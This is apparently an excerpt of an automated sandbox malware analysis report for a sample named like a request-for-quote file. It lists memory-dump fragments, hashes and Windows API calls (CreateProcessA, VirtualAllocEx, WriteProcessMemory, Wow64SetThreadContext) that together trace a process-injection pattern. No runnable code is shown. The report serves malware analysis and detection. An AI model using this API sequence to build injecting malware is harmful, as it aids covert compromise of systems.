                                                                                                                          • Opcode Fuzzy Hash: 94d78c6575a753f12d0e7359f05abd1c41e7c3a0f96287fb26f7257541110474
                                                                                                                          • Instruction Fuzzy Hash: B7912634B401148FCB14DF69C484AAA7BFABF89710F5580A9E505CB3B5DB71EC42CB91
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2044813173.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_9930000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (bq$Hbq
                                                                                                                          • API String ID: 0-4081012451
                                                                                                                          • Opcode ID: 05c1827ec16302282a013fd41a266f27d50ea45079e139c79ecd4d05faaacc9d
                                                                                                                          • Instruction ID: f29b8e10a98b94ba9f71a7b58d2532c6b2ee6b5d391101a9571d4c1bf69e9b66
                                                                                                                          • Opcode Fuzzy Hash: 05c1827ec16302282a013fd41a266f27d50ea45079e139c79ecd4d05faaacc9d
                                                                                                                          • Instruction Fuzzy Hash: BD41F1347086508FC705AF38C810A2E7BF6AFC6314B55C4AAE545DB3A2DE35DC06CB95
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2039183244.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_7ca0000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 4'^q$4'^q
                                                                                                                          • API String ID: 0-2697143702
                                                                                                                          • Opcode ID: 3559a028411df5ab0b2abfc3af70e8b5bf613877f4cb9afa3e32565a446a7bb2
                                                                                                                          • Instruction ID: 4227f48505c5ebd13a716efeca49423b0c00c3f6f1775c8cb7bf6edb748c880e
                                                                                                                          • Opcode Fuzzy Hash: 3559a028411df5ab0b2abfc3af70e8b5bf613877f4cb9afa3e32565a446a7bb2
                                                                                                                          • Instruction Fuzzy Hash: FF3169B1F42217AFCB24567896501BEB3D1AFC129AF10847AC902CB340FE36CAC5C791
                                                                                                                          APIs
                                                                                                                          • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 074AA2AB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2036711409.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_74a0000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MemoryProcessWrite
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3559483778-0
                                                                                                                          • Opcode ID: 98a1f3a7973d4e42b06e6b31df5a17e161ed645b4f1eae743aa2d3e5cb7cb6f0
                                                                                                                          • Instruction ID: c6fe3cd81f633b14453655d90484ae4b7d8aadc025f7febf8c2115341a311927
                                                                                                                          • Opcode Fuzzy Hash: 98a1f3a7973d4e42b06e6b31df5a17e161ed645b4f1eae743aa2d3e5cb7cb6f0
                                                                                                                          • Instruction Fuzzy Hash: EE9147B4D093999FCB02CFA8C4946DEBFF1EF5A300F1480AAD054AB261D7386955CB64
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2044885753.0000000009940000.00000040.00000800.00020000.00000000.sdmp, Offset: 09940000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_9940000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: .$4
                                                                                                                          • API String ID: 0-500082667
                                                                                                                          • Opcode ID: de231da2f462fb3183b55e8e9da4cefd94a440a9938d91b6eb190da19ba6deb3
                                                                                                                          • Instruction ID: 3aebcf452ecad8c94d374390c32be267b3f2cd667d624623366a7d407c4750d7
                                                                                                                          • Opcode Fuzzy Hash: de231da2f462fb3183b55e8e9da4cefd94a440a9938d91b6eb190da19ba6deb3
                                                                                                                          • Instruction Fuzzy Hash: 30119E78A01228CFDB51CF18D888FA8B7F2BB08304F509595E809E7391D775AA84CF51
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2045340125.0000000009A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A20000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_9a20000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: #$TJcq
                                                                                                                          • API String ID: 0-1410053842
                                                                                                                          • Opcode ID: 2130e7c61f827c98fe31dc0408dc0d3097e3f1dfa99e300896e4c5f84bb330ff
                                                                                                                          • Instruction ID: b0d49da88080b5f542437cdd4a13eba865fbcfa14c4bf83a6fb344cf04a8d8c9
                                                                                                                          • Opcode Fuzzy Hash: 2130e7c61f827c98fe31dc0408dc0d3097e3f1dfa99e300896e4c5f84bb330ff
                                                                                                                          • Instruction Fuzzy Hash: 96F06274D051288FDB60DF64D849B8DBBB2FB89315F1090DAC80DA7355DB306E858F55
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2044813173.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_9930000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: ,bq
                                                                                                                          • API String ID: 0-2474004448
                                                                                                                          • Opcode ID: 57315c84140447724a9aba38aa093d11e5e9d31591e215a676bda864ee865beb
                                                                                                                          • Instruction ID: 55b6f2498b79b64cca25a575666558a6ee5dfba5559554f58312fb28a5462453
                                                                                                                          • Opcode Fuzzy Hash: 57315c84140447724a9aba38aa093d11e5e9d31591e215a676bda864ee865beb
                                                                                                                          • Instruction Fuzzy Hash: E3522875A002289FDB64CF68C945BEDBBF6BB88300F5580D9E549EB361DA319D80CF61
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2044813173.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_9930000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (_^q
                                                                                                                          • API String ID: 0-538443824
                                                                                                                          • Opcode ID: 39003796a1f4ecc9d32fb2728dcbe687efb6aeef32a7b3307dafc4b230c5a827
                                                                                                                          • Instruction ID: 61a2cc75ba8b1ea973cb09d0264acd653604d28db7eea9fb9aa648cb71224a88
                                                                                                                          • Opcode Fuzzy Hash: 39003796a1f4ecc9d32fb2728dcbe687efb6aeef32a7b3307dafc4b230c5a827
                                                                                                                          • Instruction Fuzzy Hash: AB226935A002189FDB24CFA9D494AADB7F6FF88314F558469E905EB3A1CB71EC41CB90
                                                                                                                          APIs
                                                                                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 074A78DF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2036711409.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_74a0000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 963392458-0
                                                                                                                          • Opcode ID: d028490173606d2a36e95a47a1255d747d0702f049954d5f7fe72d4e1f86d3ff
                                                                                                                          • Instruction ID: 6ba4a1f193673f5c5cc1da8e287ad3cb14ce0127819b8bfbd544ce7f3af86b6e
                                                                                                                          • Opcode Fuzzy Hash: d028490173606d2a36e95a47a1255d747d0702f049954d5f7fe72d4e1f86d3ff
                                                                                                                          • Instruction Fuzzy Hash: 06A114B4D00219DFDB21CFA8C841BEEBBF1BF59300F14916AE858A7250DB749985CF85
                                                                                                                          APIs
                                                                                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 074A78DF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2036711409.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_74a0000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 963392458-0
                                                                                                                          • Opcode ID: a6ff55df48025758972044f820c8f344d242bcf4c008a6f2324c038bc0a141fd
                                                                                                                          • Instruction ID: 15126a95871678b6c793d82557d20300b4186766ae4cd2a56fb3da0e3fadb0dc
                                                                                                                          • Opcode Fuzzy Hash: a6ff55df48025758972044f820c8f344d242bcf4c008a6f2324c038bc0a141fd
                                                                                                                          • Instruction Fuzzy Hash: F6A124B4D00219DFDB21CFA9C841BEEBBF1BF59310F14916AE858A7240DB749985CF85
                                                                                                                          APIs
                                                                                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 074A9557
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2036711409.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_74a0000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ContextThreadWow64
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 983334009-0
                                                                                                                          • Opcode ID: c7f779a5450dba41c28ea7cfbb00f962d7a7579bcdcce40928c0b578c0510e51
                                                                                                                          • Instruction ID: 35f3da4e4b31fa942132714a7f564b2eb41d953c7df2200db394c795d2ffee27
                                                                                                                          • Opcode Fuzzy Hash: c7f779a5450dba41c28ea7cfbb00f962d7a7579bcdcce40928c0b578c0510e51
                                                                                                                          • Instruction Fuzzy Hash: CB51DEB5D05219DFCB04DFA9D981AEEBBF1FB89310F24802AE419B7210D738AA45CF54
                                                                                                                          APIs
                                                                                                                          • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 074AA2AB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2036711409.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_74a0000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MemoryProcessWrite
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3559483778-0
                                                                                                                          • Opcode ID: 5397171883c8af4cab4c04a55701df1ca448e27364217fbcc174932f9bfb912b
                                                                                                                          • Instruction ID: b442d2bf5bcc5f8b6f250efdd4a49eed56dbadd956c4869063aade9d05dc9365
                                                                                                                          • Opcode Fuzzy Hash: 5397171883c8af4cab4c04a55701df1ca448e27364217fbcc174932f9bfb912b
                                                                                                                          • Instruction Fuzzy Hash: 9F41AAB5D012589FCF00CFA9D984ADEFBF1BB49310F24942AE819B7210D739AA45CF64
                                                                                                                          APIs
                                                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 074A9BAA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2036711409.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_74a0000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4275171209-0
                                                                                                                          • Opcode ID: c556a4b7363db5d46044ec24841dedbf2e93b6384eb8aa3c2e630c2814c17213
                                                                                                                          • Instruction ID: 202079e6152c4782395c4759d1a8b6182c42bbabae62abe389273d4c2a91b7fa
                                                                                                                          • Opcode Fuzzy Hash: c556a4b7363db5d46044ec24841dedbf2e93b6384eb8aa3c2e630c2814c17213
                                                                                                                          • Instruction Fuzzy Hash: 22319AB9D042589FCF14CFA9D980ADEFBB1FB59320F10942AE815B7210D735A945CF54
                                                                                                                          APIs
                                                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 074A9BAA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2036711409.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_74a0000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4275171209-0
                                                                                                                          • Opcode ID: 886f030089bc1ccbf1f0a2a24a4cfad2c3aa7448cc230186df59424c3c513e0e
                                                                                                                          • Instruction ID: fd7617439c04f0da3b6e0a11b5119d0391e4cbe6c92774eaf86b99586d333d07
                                                                                                                          • Opcode Fuzzy Hash: 886f030089bc1ccbf1f0a2a24a4cfad2c3aa7448cc230186df59424c3c513e0e
                                                                                                                          • Instruction Fuzzy Hash: 123189B9D002589FCF14CFA9D980ADEFBB1FB59310F10942AE815B7210D735A945CF58
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2044693538.0000000009870000.00000040.00000800.00020000.00000000.sdmp, Offset: 09870000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_9870000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Sleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3472027048-0
                                                                                                                          • Opcode ID: f06122e3e617829a38bad4d11aec0a643642ee1cdfdbd6cba40bd558c2d92061
                                                                                                                          • Instruction ID: 69597e366ab0bc709d5333a41f745aff660cc366250b2432544b4a33ad9933d8
                                                                                                                          • Opcode Fuzzy Hash: f06122e3e617829a38bad4d11aec0a643642ee1cdfdbd6cba40bd558c2d92061
                                                                                                                          • Instruction Fuzzy Hash: CB41EDB4D052089FCB14CFA8D881AEDFFF1AF59310F14806AE844A7320C7369A46DF54
                                                                                                                          APIs
                                                                                                                          • VirtualProtect.KERNEL32(?,?,?,?), ref: 09B6E8DC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2045922427.0000000009B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_9b60000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ProtectVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 544645111-0
                                                                                                                          • Opcode ID: 0e8a60e38676f8118331c67565f2711887da494644bc8b6d6f10a078cbb96192
                                                                                                                          • Instruction ID: e4d69fa2e9e6c616920ab6f636afda06696a244a0ccec917e40f66e333406749
                                                                                                                          • Opcode Fuzzy Hash: 0e8a60e38676f8118331c67565f2711887da494644bc8b6d6f10a078cbb96192
                                                                                                                          • Instruction Fuzzy Hash: 4331A8B9D012589FCB14CFA9D984A9EFBB0AF49320F20902AE818B7210D735A9458F54
                                                                                                                          APIs
                                                                                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 074A9557
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2036711409.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_74a0000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ContextThreadWow64
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 983334009-0
                                                                                                                          • Opcode ID: d4c81428e352ec872dc5d4d4849c48bd2868f42a6fbdc5044604b4c110dccf74
                                                                                                                          • Instruction ID: a4f1f163b3fd8127b5e04654ff95e193b93cd0b8bf76ede8d0c7792197d35cb8
                                                                                                                          • Opcode Fuzzy Hash: d4c81428e352ec872dc5d4d4849c48bd2868f42a6fbdc5044604b4c110dccf74
                                                                                                                          • Instruction Fuzzy Hash: 0D31BBB5D012589FCB14DFAAD985AEEFBF0BF49310F24842AE419B7200D738A985CF54
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2044693538.0000000009870000.00000040.00000800.00020000.00000000.sdmp, Offset: 09870000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_9870000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Sleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3472027048-0
                                                                                                                          • Opcode ID: da29a1f64ace703f7fa85f49dcfe4de00186607309e3c5ad4478133afb5df736
                                                                                                                          • Instruction ID: 4358cddaeda837d87f5bd8a4251cd3b8e3e4892265492921b5b6387e96cf63b1
                                                                                                                          • Opcode Fuzzy Hash: da29a1f64ace703f7fa85f49dcfe4de00186607309e3c5ad4478133afb5df736
                                                                                                                          • Instruction Fuzzy Hash: 7931B8B5D012589FCB14CFA9D980AEEFBF1AF4A320F24942AE855B7210C735A945CF94
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2044693538.0000000009870000.00000040.00000800.00020000.00000000.sdmp, Offset: 09870000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_9870000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Sleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3472027048-0
                                                                                                                          • Opcode ID: 84271d2585261df71a35401d0b51550d8aed1c999b04027e7e0de6f32391f18e
                                                                                                                          • Instruction ID: 76b455bbd593c0548c1beccb05a9ffee0f420ec8fe157f82ae3c69ec62513dbe
                                                                                                                          • Opcode Fuzzy Hash: 84271d2585261df71a35401d0b51550d8aed1c999b04027e7e0de6f32391f18e
                                                                                                                          • Instruction Fuzzy Hash: 3531A9B5D012589FCB10CFA9D984AEEFBF5AB49320F24942AE855B7210C734A945CFA4
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2045340125.0000000009A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A20000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_9a20000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 0-3916222277
                                                                                                                          • Opcode ID: 456dbc6aa2f46bc02140288c3d134e770a87c017a79c0e29de04e80adbb252bd
                                                                                                                          • Instruction ID: 687f5976908ce5f3e14a6e7012946b30cf11f2afaba092759ae4a890785ed613
                                                                                                                          • Opcode Fuzzy Hash: 456dbc6aa2f46bc02140288c3d134e770a87c017a79c0e29de04e80adbb252bd
                                                                                                                          • Instruction Fuzzy Hash: A1C1F970D09219CFDB50CF99D244BEEBBF6FB46744F249029D429AB250C3785985CFA1
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2044813173.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_9930000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (bq
                                                                                                                          • API String ID: 0-149360118
                                                                                                                          • Opcode ID: dd7cf517454bec1e1b7e6d63045d85de9da1ec2ea9aaba4041c576a37810dfce
                                                                                                                          • Instruction ID: d4abbccb573dde654ac2060f84ae0f6e1ac546c3e22f5220b74980b29dcb27e4
                                                                                                                          • Opcode Fuzzy Hash: dd7cf517454bec1e1b7e6d63045d85de9da1ec2ea9aaba4041c576a37810dfce
                                                                                                                          • Instruction Fuzzy Hash: 9CA19F31301240AFD7169F68D854A2A7BB7EF89310F15C5A9E6458F3B2CB32EC46DB51
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2045340125.0000000009A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A20000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_9a20000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 0-3916222277
                                                                                                                          • Opcode ID: 8c26a6f4cc8e3648d02361c30527e97798debb887b1c53253d097e0bda5704a0
                                                                                                                          • Instruction ID: f3a2ec8e771e3b8a18562e77b7207322a245ab189fc4ed002e030e5d411fea09
                                                                                                                          • Opcode Fuzzy Hash: 8c26a6f4cc8e3648d02361c30527e97798debb887b1c53253d097e0bda5704a0
                                                                                                                          • Instruction Fuzzy Hash: 4DB109B0D09219CFDB50CF99D148BEEBBF6FB46744F249029D429AB290C3785985CFA1
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2045340125.0000000009A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A20000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_9a20000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: @
                                                                                                                          • API String ID: 0-2766056989
                                                                                                                          • Opcode ID: 702ec80749894227f356c0ae66e45d2e8c435d9192527a080e95348717161ee8
                                                                                                                          • Instruction ID: 1b859175b5ea949b7939187fcae9cc2e9e7249163b2a6464f9fa464e5d790faa
                                                                                                                          • Opcode Fuzzy Hash: 702ec80749894227f356c0ae66e45d2e8c435d9192527a080e95348717161ee8
                                                                                                                          • Instruction Fuzzy Hash: D7D1D274A05268DFDB60DF68D884B9ABBB2FB49304F0480DAE90DA7354DB345E85CF51
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2044885753.0000000009940000.00000040.00000800.00020000.00000000.sdmp, Offset: 09940000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_9940000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 4k{
                                                                                                                          • API String ID: 0-2946010290
                                                                                                                          • Opcode ID: d4afd677775e7549e1c28b4332b4f5b341844140fde2537aad5eab9d777366dc
                                                                                                                          • Instruction ID: ee523b13ebdc3da39dc1d365b01e8b73c8b7faf7705a35d6ee338ec518f87ad5
                                                                                                                          • Opcode Fuzzy Hash: d4afd677775e7549e1c28b4332b4f5b341844140fde2537aad5eab9d777366dc
                                                                                                                          • Instruction Fuzzy Hash: 17915970E4A248DFCF46CFA8D484AAEBBB6EF59304F20842AE825AB354D7345D45CF51
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2044813173.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_9930000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 4'^q
                                                                                                                          • API String ID: 0-1614139903
                                                                                                                          • Opcode ID: 68cc014ad1c3c07986d4ef7ba0e1b8dfddd9c45414b1c0beb2af91f7fa5d5e31
                                                                                                                          • Instruction ID: bc9f9b22b03922a9db07ae82a72691faecb04c831dddc18addeabebad5c07dbb
                                                                                                                          • Opcode Fuzzy Hash: 68cc014ad1c3c07986d4ef7ba0e1b8dfddd9c45414b1c0beb2af91f7fa5d5e31
                                                                                                                          • Instruction Fuzzy Hash: FAA1FE34A10518DFCB04DFA4D894AADB7B2FF89300F95D159E40AAB365DB71EC42CB91
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2044813173.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_9930000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (bq
                                                                                                                          • API String ID: 0-149360118
                                                                                                                          • Opcode ID: 561d2cdbb2357d5fb9ffa0f44e386a4c61da6aa786f1242e545c63ee76c68d5a
                                                                                                                          • Instruction ID: 0c84bf5585301f11acd8324102285ed9931f159dea0309957b17ecc4389237f2
                                                                                                                          • Opcode Fuzzy Hash: 561d2cdbb2357d5fb9ffa0f44e386a4c61da6aa786f1242e545c63ee76c68d5a
                                                                                                                          • Instruction Fuzzy Hash: BF716630E006099FDB14DFA9D9806AEBBF7BFC8300F64C569E549A7354DB31AE058B91
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2045340125.0000000009A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A20000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_9a20000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: @
                                                                                                                          • API String ID: 0-2766056989
                                                                                                                          • Opcode ID: adae14d9e792258261ed0b6ecb5ce3586090b238f3c78e5085434d52268ac3bf
                                                                                                                          • Instruction ID: 2b1e38ac252aa9368c6cece875da197d6b48a6368ac4389b7db8b515300af359
                                                                                                                          • Opcode Fuzzy Hash: adae14d9e792258261ed0b6ecb5ce3586090b238f3c78e5085434d52268ac3bf
                                                                                                                          • Instruction Fuzzy Hash: 41B1D274E05268CFDB60DF68D884B9ABBB2FB49304F1480DAEA09A7354DB345E85CF51
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2044813173.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_9930000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (bq
                                                                                                                          • API String ID: 0-149360118
                                                                                                                          • Opcode ID: 01fb4c7090a4875bc085860c765f913e2380049e26a39bbc1a3c87150ce850dc
                                                                                                                          • Instruction ID: f95d30de8a93cc4cd0696b83e706d843dbe025257a6a7a51d5df8974654bbd93
                                                                                                                          • Opcode Fuzzy Hash: 01fb4c7090a4875bc085860c765f913e2380049e26a39bbc1a3c87150ce850dc
                                                                                                                          • Instruction Fuzzy Hash: 3A71A0317042918FDB359F38C068B29BBE6ABD5310B69C569E49ACB6E2CF31EC41C745
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2045340125.0000000009A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A20000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_9a20000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: @
                                                                                                                          • API String ID: 0-2766056989
                                                                                                                          • Opcode ID: 90a9f1fdbb2e2bdd6a66d50d08b5c77bf33d3ab46fc7a8a0f6869f34d9de3d0a
                                                                                                                          • Instruction ID: b26a301727adc09b4ce285fb0572c2aa4b23dcd14b40d9bc04aed707dd4c6552
                                                                                                                          • Opcode Fuzzy Hash: 90a9f1fdbb2e2bdd6a66d50d08b5c77bf33d3ab46fc7a8a0f6869f34d9de3d0a
                                                                                                                          • Instruction Fuzzy Hash: 48A1D374E05268DFDB60CF68D884B9AB7B2FB49304F0480DAEA09A7354DB345E85CF51
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2045340125.0000000009A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A20000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_9a20000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: @
                                                                                                                          • API String ID: 0-2766056989
                                                                                                                          • Opcode ID: 95f0abf7979652ecad411ab6a81792de7f923d3592487686bf1fb1a6eee6e5e6
                                                                                                                          • Instruction ID: bcb4373688d8dee881b81c3a78d6cf764b896c4efc2d7bd3d47476fe199e1d2e
                                                                                                                          • Opcode Fuzzy Hash: 95f0abf7979652ecad411ab6a81792de7f923d3592487686bf1fb1a6eee6e5e6
